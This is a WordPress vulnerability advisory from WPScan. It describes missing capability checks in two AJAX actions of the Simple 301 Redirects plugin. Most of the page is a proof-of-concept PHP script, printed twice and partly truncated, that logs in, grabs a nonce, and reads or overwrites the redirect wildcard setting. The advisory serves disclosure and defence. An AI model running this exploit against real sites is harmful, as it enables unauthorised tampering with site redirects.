
wpvulndb · Chloe Chamberland · WPVDB-ID: CE8F9648-30FB-4FB9-894E-879DC0F26F98
History: May 26, 2021 - 12:00 a.m.

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Update and Retrieve Wildcard Value

2021-05-26 00:00:00
Chloe Chamberland
wpscan.com
wordpress
plugin
security
capability checks
nonce
authenticated users
wildcard value
ajax actions

EPSS

0.001

Percentile

21.8%

In the plugin, the AJAX actions simple301redirects/admin/get_wildcard and simple301redirects/admin/wildcard performed no capability check and only an insufficient nonce check, which made it possible for authenticated users to retrieve and update the wildcard value used for redirects.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); echo ‘Getting REST API Nonce!’; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Import Nonce preg_match(‘/([^"]+)/’, $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo ‘wildcard!’; //Wildcard $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php’ ); curl_setopt( $ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’ ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘simple301redirects/admin/wildcard’, ‘security’ => $restnonce, ‘toggle’ => ‘I have updated this setting!’, ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?> $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); echo ‘Getting REST API Nonce!’; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . 
‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Import Nonce preg_match(‘/([^"]+)/’, $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo ‘Get wildcard!’; //Get wildcard $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php’ ); curl_setopt( $ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’ ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘simple301redirects/admin/get_wildcard’, ‘security’ => $restnonce, ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?>

